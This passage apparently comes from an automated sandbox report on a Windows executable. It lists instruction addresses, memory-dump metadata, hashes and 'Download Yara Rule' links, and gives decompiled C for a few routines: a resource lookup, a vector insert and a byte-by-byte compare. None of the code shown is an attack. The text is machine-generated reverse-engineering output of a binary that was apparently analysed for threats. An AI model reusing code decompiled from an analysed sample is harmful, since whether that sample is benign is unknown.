0x00412f57
0x00412f59
0x00412f5b
0x00412f5b
0x00000000
0x00412f5b
0x00412c3d
0x00412c3f
0x00412c41
0x00412c46
0x00412c46
0x00412c49
0x00412c49
0x00412c55
0x00412c58
0x00412c5a
0x00412c5c
0x00000000
0x00412c5c
0x00412be5
0x00412be8
0x00412beb
0x00412bf0
0x00412bf2
0x00412bf5
0x00000000
0x00000000
0x00412bfa
0x00412c00
0x00412c05
0x00412c0e
0x00412c11
0x00412c14
0x00000000
0x00000000
0x00412c1a
0x00000000
0x00412c9d
0x00412ca5
0x00000000
0x00000000
0x00412caf
0x00000000
0x00000000
0x00412cc9
0x00412ccb
0x00412ccb
0x00412cce
0x00412ccf
0x00412cd2
0x00412cd6
0x00000000
0x00000000
0x00412ce5
0x00412ce9
0x00000000
0x00000000
0x00412cf0
0x00412ca6
0x00412ca6
0x00412ca8
0x00000000
0x00000000
0x00412cf3
0x00412cfb
0x00412cfe
0x00412d01
0x00412d05
0x00412d08
0x00412d0d
0x00412d0f
0x00412d13
0x00412d17
0x00412d1a
0x00412d1f
0x00412d21
0x00412d23
0x00412d26
0x00412d28
0x00412d2d
0x00412d30
0x00412d35
0x00412d37
0x00412d39
0x00412d39
0x00412d37
0x00412d3c
0x00412d3c
0x00412d3f
0x00412d40
0x00412d41
0x00412d44
0x00412d45
0x00412d47
0x00412d49
0x00412d4d
0x00412d51
0x00412d54
0x00412d57
0x00412d5b
0x00000000
0x00000000
0x00412d62
0x00412d6a
0x00412d6d
0x00412d70
0x00412d73
0x00412d76
0x00412d77
0x00412d79
0x00412d7d
0x00412d7f
0x00412d7f
0x00412d7f
0x00412d83
0x00412d86
0x00412d86
0x00412d89
0x00412d8d
0x00000000
0x00000000
0x00412d97
0x00412d9a
0x00412d9a
0x00412d9d
0x00412d9f
0x00000000
0x00000000
0x00412db1
0x00412db4
0x00412db5
0x00000000
0x00000000
0x00000000
0x00000000
0x00412dbe
0x00412dc4
0x00412dc5
0x00412dc8
0x00412da4
0x00412da4
0x00412da5
0x00412cdb
0x00412cdb
0x00412cdc
0x00412cde
0x00000000
0x00000000
0x00412ecb
0x00000000
0x00000000
0x00412dd6
0x00000000
0x00000000
0x00412dcd
0x00412dcf
0x00000000
0x00000000
0x00412de1
0x00412de4
0x00412de5
0x00000000
0x00000000
0x00412df0
0x00412df3
0x00412df6
0x00412df7
0x00000000
0x00000000
0x00412e04
0x00412e05
0x00000000
0x00000000
0x00412cc3
0x00412ecc
0x00412ecc
0x00000000
0x00000000
0x00412cb4
0x00412cb6
0x00000000
0x00000000
0x00412e15
0x00412e1c
0x00412e1d
0x00412e1f
0x00412e22
0x00000000
0x00000000
0x00412e2a
0x00412e2d
0x00000000
0x00000000
0x00412e34
0x00412e37
0x00000000
0x00000000
0x00412e40
0x00412e43
0x00412e46
0x00412e47
0x00412e4a
0x00412e4b
0x00412e4e
0x00000000
0x00000000
0x00412e58
0x00000000
0x00000000
0x00412e5d
0x00412e5e
0x00412e5e
0x00412e63
0x00412e63
0x00000000
0x00000000
0x00412e6b
0x00412e6c
0x00000000
0x00000000
0x00412e71
0x00412e74
0x00412e77
0x00412e7a
0x00412e7b
0x00412e7b
0x00412e7f
0x00000000
0x00000000
0x00412e86
0x00412e8a
0x00412e8f
0x00412e8f
0x00000000
0x00000000
0x00412e95
0x00412e98
0x00412e9a
0x00000000
0x00000000
0x00412ea1
0x00412ea4
0x00412ea7
0x00412eaa
0x00412ead
0x00412eb0
0x00412eb3
0x00412eb6
0x00412ec7
0x00412ec8
0x00412ecf
0x00412ecf
0x00412ed1
0x00000000
0x00412ed1
0x00412ebe
0x00412ebf
0x00412ec2
0x00000000
0x00000000
0x00412ed8
0x00412ed9
0x00412ed9
0x00412edb
0x00000000
0x00000000
0x00412f02
0x00412f03
0x00412f06
0x00412f08
0x00000000
0x00000000
0x00412c8d
0x00412c90
0x00412c93
0x00412c96
0x00412c97
0x00412c97
0x00000000
0x00000000
0x00412edf
0x00412ee2
0x00412ee3
0x00412ee3
0x00412ee6
0x00412ee6
0x00412ee7
0x00412eeb
0x00412eeb
0x00000000
0x00000000
0x00412eee
0x00412ef1
0x00412ef4
0x00412ef7
0x00412ef8
0x00412ef8
0x00412ef9
0x00412efc
0x00412efc
0x00412efe
0x00000000
0x00000000
0x00412f0f
0x00412f12
0x00412f15
0x00412f18
0x00412f19
0x00412f1d
0x00412f20
0x00412f21
0x00412f25
0x00412f26
0x00412f28
0x00412f2a
0x00412ad3
0x00412ad3
0x00412ad5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00412f32
0x00412f34
0x00412f36
0x00412f38
0x00412f3b
0x00000000
0x00000000
0x00412c77
0x00412c77
0x00412c7e
0x00412c83
0x00412c83
0x00000000
0x00000000
0x00412c1a
0x00412c68
0x00412c6b
0x00412c6b
0x00412c6b
0x00412c72
0x00000000
0x00412c72
0x00412b9a
0x00412b9c
0x00412b9f
0x00000000
0x00000000
0x00412ba1
0x00412ba7
0x00412baa
0x00412baf
0x00412bb1
0x00000000
0x00000000
0x00412bb7
0x00412bbe
0x00000000
0x00000000
0x00000000
0x00412bc0
0x00412b18
0x00412b1c
0x00000000
0x00000000
0x00412b1e
0x00412b24
0x00412b2e
0x00412b2e
0x00412b34
0x00412b3e
0x00412b44
0x00412b47
0x00000000
0x00000000
0x00412b49
0x00412b57
0x00412b5d
0x00412b5f
0x00000000
0x00000000
0x00000000
0x00412b5f
0x00412b36
0x00412b3c
0x00000000
0x00000000
0x00000000
0x00412b3c
0x00412b26
0x00412b2c
0x00000000
0x00000000
0x00000000
0x00412afd
0x00412b08
0x00412b0d
0x00412b0f
0x00412aa5
0x00412aa5
0x00412f5e
0x00412f5e
0x00412f63
0x00412f68
0x00412f68
0x00412f6a
0x00412f71
0x00412f78
0x00412c85
0x00412c8a
0x00412c8a
0x00000000
0x00412b0f
0x00412afb
0x00412ab6
0x00412ab9
0x00412abb
0x00000000
0x00000000
0x00412ac6
0x00412ac7
0x00412ac8
0x00412acd
0x00000000
0x00412acd
0x00412a8f
0x00412a94
0x00412a9f
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 00412A6E

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: eb19999ea20314628054c06fcf092a56201718a40be329a0728135ec779f6b6e
Instruction ID: d7d619664656949ce067dece4b6af13c140b9e76603c89109454fdb15b5f17a2
Opcode Fuzzy Hash: eb19999ea20314628054c06fcf092a56201718a40be329a0728135ec779f6b6e
Instruction Fuzzy Hash: 9BF1B17060020AAFDB14DF55C980AFF77B9EF04300F10841AF919EB291D7B8D9A2DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402260, Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402260(struct HINSTANCE__* _a4, unsigned int _a8) {
				struct HRSRC__* _t6;

				_t10 = _a8;
				_t9 = _a4;
				_t6 = FindResourceA(_a4, (_a8 >> 0x00000004) + 0x00000001 & 0x0000ffff, 6);
				if(_t6 != 0) {
					return E004022A0(_t9, _t6, _t10);
				} else {
					return _t6;
				}
			}

0x00402261
0x0040226b
0x00402279
0x00402281
0x00402293
0x00402285
0x00402285
0x00402285

APIs

FindResourceA.KERNEL32(0000000C,?,00000006), ref: 00402279

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: FindResource
String ID:
API String ID: 1635176832-0
Opcode ID: 6f04e6bcb9591f039c4a338b423f90721467dc9880123e2e94898019681909bc
Instruction ID: 52db51ade11fcd119d87dcb60174f5aabdf78ca0ee43c3f91c556716061a29dd
Opcode Fuzzy Hash: 6f04e6bcb9591f039c4a338b423f90721467dc9880123e2e94898019681909bc
Instruction Fuzzy Hash: 3ED012667051203BE510161ABC05ABB635CDFC1639B05407FF845EA280D274EC5661B5

Uniqueness

Uniqueness Score: -1.00%

Function 004046E0, Relevance: 1.5, Strings: 1, Instructions: 271
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E004046E0(signed int __ecx, intOrPtr _a4, signed int _a12) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				short _v48;
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t112;
				signed int _t113;
				signed int _t121;
				signed int _t126;
				signed int _t133;
				unsigned int _t148;
				signed int _t153;
				signed int _t155;
				intOrPtr _t161;
				signed int _t162;
				intOrPtr _t178;
				intOrPtr _t182;
				signed int _t204;
				unsigned int _t218;
				signed int _t252;
				intOrPtr _t254;
				signed int _t258;
				signed int _t259;
				unsigned int _t263;
				signed int _t264;
				intOrPtr _t265;
				signed int _t269;
				void* _t270;
				intOrPtr _t271;
				void* _t272;

				_push(0xffffffff);
				_push(E0043BB38);
				_push( *[fs:0x0]);
				_t271 = _t270 - 0x30;
				_t112 =  *0x44f5d0; // 0x765b253d
				_t113 = _t112 ^ _t269;
				_v24 = _t113;
				_push(_t113);
				 *[fs:0x0] =  &_v16;
				_v20 = _t271;
				_t263 = 0;
				_t176 = __ecx;
				_v60 = __ecx;
				_v28 = 7;
				_v32 = 0;
				_v48 = 0;
				E00404D70(_a4,  &_v52, 0, 0xffffffff);
				_v8 = 0;
				_t182 =  *((intOrPtr*)(__ecx + 4));
				if(_t182 != 0) {
					_t263 = ((0x92492493 * ( *((intOrPtr*)(__ecx + 0xc)) - _t182) >> 0x20) +  *((intOrPtr*)(__ecx + 0xc)) - _t182 >> 4 >> 0x1f) + ((0x92492493 * ( *((intOrPtr*)(__ecx + 0xc)) - _t182) >> 0x20) +  *((intOrPtr*)(__ecx + 0xc)) - _t182 >> 4);
				}
				if(_t182 != 0) {
					_t121 = ((0x92492493 * ( *(_t176 + 8) - _t182) >> 0x20) +  *(_t176 + 8) - _t182 >> 4 >> 0x1f) + ((0x92492493 * ( *(_t176 + 8) - _t182) >> 0x20) +  *(_t176 + 8) - _t182 >> 4);
					__eflags = _t121;
				} else {
					_t121 = 0;
				}
				if(0x9249249 - _t121 < 1) {
					L00404A20();
				}
				if(_t182 != 0) {
					_t126 = ((0x92492493 * ( *(_t176 + 8) - _t182) >> 0x20) +  *(_t176 + 8) - _t182 >> 4 >> 0x1f) + ((0x92492493 * ( *(_t176 + 8) - _t182) >> 0x20) +  *(_t176 + 8) - _t182 >> 4);
					__eflags = _t126;
				} else {
					_t126 = 0;
				}
				if(_t263 >= _t126 + 1) {
					_t252 =  *(_t176 + 8);
					_t264 = _a12;
					_t218 = (0x92492493 * (_t252 - _t264) >> 0x20) + _t252 - _t264 >> 4;
					_v56 = 0;
					__eflags = (_t218 >> 0x1f) + _t218 - 1;
					_t133 = _v56;
					if((_t218 >> 0x1f) + _t218 >= 1) {
						_push(_t133);
						_push(_v56);
						_t220 = _t252;
						_v60 = _t252 - 0x1c;
						 *(_t176 + 8) = E004051C0(_t252 - 0x1c, _t252, _t252);
						_t272 = _t271 + 0xc;
						E00405060(_v60, _t264, _t252, __eflags);
						_t253 = _t264 + 0x1c;
					} else {
						_push(_v56);
						_push(_t133);
						_t83 = _t264 + 0x1c; // 0x1c
						E004051C0(_t264, _t83, _t252);
						_v8 = 3;
						_v56 = 0;
						_push(_v56);
						_t220 = _v56;
						_push(_v56);
						E004050D0(1 - ((0x92492493 * ( *(_t176 + 8) - _t264) >> 0x20) +  *(_t176 + 8) - _t264 >> 4) + ((0x92492493 * ( *(_t176 + 8) - _t264) >> 0x20) +  *(_t176 + 8) - _t264 >> 4 >> 0x1f),  *(_t176 + 8),  &_v52);
						_v8 = 0;
						_t272 = _t271 + 0x1c;
						 *(_t176 + 8) =  *(_t176 + 8) + 0x1c;
						_t98 =  *(_t176 + 8) - 0x1c; // 0x0
						_t253 = _t98;
					}
					_t176 =  &_v52;
					_t138 = E00405040(_t264,  &_v52, _t253);
				} else {
					_t148 = _t263 >> 1;
					if(0x9249249 - _t148 >= _t263) {
						_t264 = _t263 + _t148;
						__eflags = _t264;
					} else {
						_t264 = 0;
					}
					if(_t182 != 0) {
						_t153 = ((0x92492493 * ( *(_t176 + 8) - _t182) >> 0x20) +  *(_t176 + 8) - _t182 >> 4 >> 0x1f) + ((0x92492493 * ( *(_t176 + 8) - _t182) >> 0x20) +  *(_t176 + 8) - _t182 >> 4);
						__eflags = _t153;
					} else {
						_t153 = 0;
					}
					if(_t264 < _t153 + 1) {
						_t264 = E00404290(_t176) + 1;
					}
					_t155 = L00404AA0(_t264);
					_v8 = 1;
					_v56 = 0;
					_push(_v56);
					_push(_v56);
					_v60 = _t155;
					_v64 = _t155;
					_t258 = E004051C0( *(_t176 + 4), _t155, _a12);
					_v56 = 0;
					_push(_v56);
					_push(_v56);
					_v64 = _t258;
					E004050D0(1, _t258,  &_v52);
					_v56 = 0;
					_push(_v56);
					_push(_v56);
					_t259 = _t258 + 0x1c;
					_t237 = _t259;
					_v64 = _t259;
					E004051C0(_a12, _t259,  *(_t176 + 8));
					_t161 = 0;
					_v8 = 0;
					_t253 =  *(_t176 + 4);
					_t272 = _t271 + 0x28;
					if(_t253 != 0) {
						_t206 =  *(_t176 + 8) - _t253;
						_t237 = (0x92492493 * ( *(_t176 + 8) - _t253) >> 0x20) + _t206 >> 4;
						_t161 = ((0x92492493 * ( *(_t176 + 8) - _t253) >> 0x20) + _t206 >> 4 >> 0x1f) + ((0x92492493 * ( *(_t176 + 8) - _t253) >> 0x20) + _t206 >> 4);
					}
					_t162 = _t161 + 1;
					_t288 = _t253;
					_v56 = _t162;
					if(_t253 != 0) {
						_t253 =  *(_t176 + 8);
						_push(_v56);
						E00405180( *(_t176 + 4),  *(_t176 + 8));
						_push( *(_t176 + 4));
						E0040A3F2(_t176, _t237,  *(_t176 + 8), _t264, _t288);
						_t162 = _v56;
						_t272 = _t272 + 8;
					}
					_t204 = _v60;
					 *((intOrPtr*)(_t176 + 0xc)) = _t204 + (_t264 * 8 - _t264) * 4;
					_t220 = _t162 * 8 - _t162;
					_t138 = _t204 + _t220 * 4;
					 *(_t176 + 8) = _t204 + _t220 * 4;
					 *(_t176 + 4) = _t204;
				}
				_v8 = 0xffffffff;
				_t289 = _v28 - 8;
				if(_v28 >= 8) {
					_push(_v48);
					_t138 = E0040A3F2(_t176, _t220, _t253, _t264, _t289);
				}
				 *[fs:0x0] = _v16;
				_pop(_t254);
				_pop(_t265);
				_pop(_t178);
				return E0042569C(_t138, _t178, _v24 ^ _t269, _t220, _t254, _t265);
			}

0x004046e3
0x004046e5
0x004046f0
0x004046f1
0x004046f4
0x004046f9
0x004046fb
0x00404701
0x00404705
0x0040470b
0x00404711
0x00404713
0x0040471b
0x0040471e
0x00404725
0x00404728
0x0040472c
0x00404731
0x00404734
0x00404739
0x00404751
0x00404751
0x00404755
0x00404771
0x00404771
0x00404757
0x00404757
0x00404757
0x0040477d
0x0040477f
0x0040477f
0x00404786
0x004047a2
0x004047a2
0x00404788
0x00404788
0x00404788
0x004047a9
0x00404903
0x00404906
0x00404916
0x00404920
0x00404924
0x00404927
0x0040492a
0x004049b8
0x004049b9
0x004049be
0x004049c0
0x004049c8
0x004049ce
0x004049d3
0x004049d8
0x00404930
0x00404933
0x00404934
0x00404935
0x0040493b
0x00404940
0x0040495e
0x00404965
0x0040496d
0x00404970
0x00404976
0x0040497b
0x00404982
0x00404985
0x0040498c
0x0040498c
0x0040498c
0x004049db
0x004049e0
0x004047af
0x004047b1
0x004047bc
0x004047c2
0x004047c2
0x004047be
0x004047be
0x004047be
0x004047c6
0x004047e2
0x004047e2
0x004047c8
0x004047c8
0x004047c8
0x004047e9
0x004047f4
0x004047f4
0x004047f9
0x004047fe
0x00404805
0x0040480c
0x00404810
0x00404817
0x0040481a
0x00404822
0x00404827
0x00404831
0x00404832
0x0040483d
0x00404840
0x0040484b
0x00404855
0x00404859
0x0040485a
0x0040485e
0x00404860
0x00404863
0x00404868
0x0040486a
0x0040486d
0x00404870
0x00404875
0x0040487a
0x00404885
0x0040488d
0x0040488d
0x0040488f
0x00404892
0x00404894
0x00404897
0x0040489c
0x0040489f
0x004048a3
0x004048ab
0x004048ac
0x004048b1
0x004048b4
0x004048b4
0x004048b7
0x004048c6
0x004048d0
0x004048d2
0x004048d5
0x004048d8
0x004048d8
0x004049e5
0x004049ec
0x004049f0
0x004049f5
0x004049f6
0x004049fb
0x00404a01
0x00404a09
0x00404a0a
0x00404a0b
0x00404a19

Strings

n@@, xrefs: 004046E0

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: n@@
API String ID: 0-1001206189
Opcode ID: 4a94e67e05970974c2d0d63f06be786f11bb60ea1f08447a4a63fd2901fefa34
Instruction ID: a7bb6ba40a795cd84473769b660dd6c17ba5c234df2462e22f251ad7a25cfe49
Opcode Fuzzy Hash: 4a94e67e05970974c2d0d63f06be786f11bb60ea1f08447a4a63fd2901fefa34
Instruction Fuzzy Hash: 8D9192B2F001059BCB08DF6CD980A9EB7B6EBC5714F18813EE905AF385DA74AD01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004289FE, Relevance: .4, Instructions: 384
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004289FE(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t206;
				signed char _t207;
				signed char _t208;
				signed char _t210;
				signed char _t211;
				signed int _t216;
				signed int _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t344;
				void* _t346;
				void* _t348;
				void* _t351;
				void* _t353;
				void* _t355;
				void* _t358;
				void* _t360;
				void* _t362;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t316 = 0;
					L17:
					if(_t316 != 0) {
						goto L1;
					}
					_t206 =  *(_t196 - 0x1b);
					if(_t206 ==  *(_t200 - 0x1b)) {
						_t316 = 0;
						L28:
						if(_t316 != 0) {
							goto L1;
						}
						_t207 =  *(_t196 - 0x17);
						if(_t207 ==  *(_t200 - 0x17)) {
							_t316 = 0;
							L39:
							if(_t316 != 0) {
								goto L1;
							}
							_t208 =  *(_t196 - 0x13);
							if(_t208 ==  *(_t200 - 0x13)) {
								_t316 = 0;
								L50:
								if(_t316 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t316 = 0;
									L61:
									if(_t316 != 0) {
										goto L1;
									}
									_t210 =  *(_t196 - 0xb);
									if(_t210 ==  *(_t200 - 0xb)) {
										_t316 = 0;
										L72:
										if(_t316 != 0) {
											goto L1;
										}
										_t211 =  *(_t196 - 7);
										if(_t211 ==  *(_t200 - 7)) {
											_t316 = 0;
											L83:
											if(_t316 != 0) {
												goto L1;
											}
											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t319 == 0) {
												L5:
												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t321 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
													}
													L2:
													return _t197;
												}
												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
												if(_t216 != 0) {
													L86:
													_t197 = _t216;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
											if(_t216 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t323 == 0) {
											L76:
											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t325 == 0) {
												L78:
												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t327 == 0) {
													L80:
													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t316 != 0) {
														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
													}
													goto L83;
												}
												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
												if(_t316 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t330 == 0) {
										L65:
										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t332 == 0) {
											L67:
											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t334 == 0) {
												L69:
												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t316 != 0) {
													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
												}
												goto L72;
											}
											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t337 == 0) {
									L54:
									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t339 == 0) {
										L56:
										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t341 == 0) {
											L58:
											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t316 != 0) {
												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											}
											goto L61;
										}
										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t344 == 0) {
								L43:
								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t346 == 0) {
									L45:
									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t348 == 0) {
										L47:
										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t316 != 0) {
											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
										}
										goto L50;
									}
									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t351 == 0) {
							L32:
							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t353 == 0) {
								L34:
								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t355 == 0) {
									L36:
									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t316 != 0) {
										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
									}
									goto L39;
								}
								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t358 == 0) {
						L21:
						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t360 == 0) {
							L23:
							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t362 == 0) {
								L25:
								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t316 != 0) {
									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
								}
								goto L28;
							}
							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
					if(_t316 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L17;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
